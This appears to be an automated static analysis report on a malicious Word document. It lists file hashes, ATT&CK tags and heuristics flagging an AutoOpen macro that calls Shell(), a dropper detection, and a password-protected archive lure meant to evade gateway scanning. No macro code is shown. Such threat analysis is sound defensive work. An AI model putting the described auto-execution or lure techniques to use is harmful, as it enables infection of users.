Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2c9516e9d54883f3…

MALICIOUS

Office (OLE)

Size: 191.0 KB
Created: 2017-12-09 12:36:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: 4f1d846f1e89ad59b4e1f53a9beb23e2
SHA-1: ec7e11b1badefb11ec6ec0fa973914b8096e648b
SHA-256: 2c9516e9d54883f318c3972935e2796549760445f930880b35d9c65ed7617247
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample contains a VBA macro whose AutoOpen function calls Shell(), so it is designed to execute arbitrary commands when the document is opened. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' points to dropper or phishing-lure functionality. The heuristic 'SE_PASSWORD_ARCHIVE_LURE' further supports the lure interpretation: the document likely instructs the user to open a password-protected archive that carries the actual malicious payload.

Heuristics (8)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff [high] SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment; this is often used to keep payloads encrypted until after gateway scanning.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 74792 bytes
SHA-256: e3010ea77726363645e2c922eff56a3b7ecfcb4d5c4a6035c4080b0248acc243
Script preview: first 1,000 lines of the extracted macro source